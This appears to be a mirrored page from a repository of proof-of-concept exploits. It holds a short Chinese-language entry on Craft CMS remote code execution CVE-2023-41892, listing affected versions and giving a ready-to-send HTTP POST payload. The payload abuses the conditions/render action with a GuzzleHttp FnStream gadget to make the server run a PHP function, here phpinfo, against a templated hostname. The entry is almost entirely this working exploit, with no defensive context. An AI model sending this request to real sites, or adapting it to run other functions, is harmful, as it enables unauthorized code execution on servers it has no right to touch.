POC/Craft CMS远程代码执行漏洞CVE-2023-41892.md at 5d13cc956da3d6b6e4efe8cc86cd45834ba0be4e

admin/POC

Fork 0

mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00

eeeeeeeeee-code 06c8413e64 first commit

2025-03-04 23:12:57 +08:00

459 B

Raw Blame History

Craft CMS远程代码执行漏洞CVE-2023-41892

影响版本

Craft CMS >= 4.0.0-RC1 Craft CMS <= 4.4.14

exp

POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}

459 B Raw Blame History

Craft CMS远程代码执行漏洞CVE-2023-41892

影响版本

exp

459 B

Raw Blame History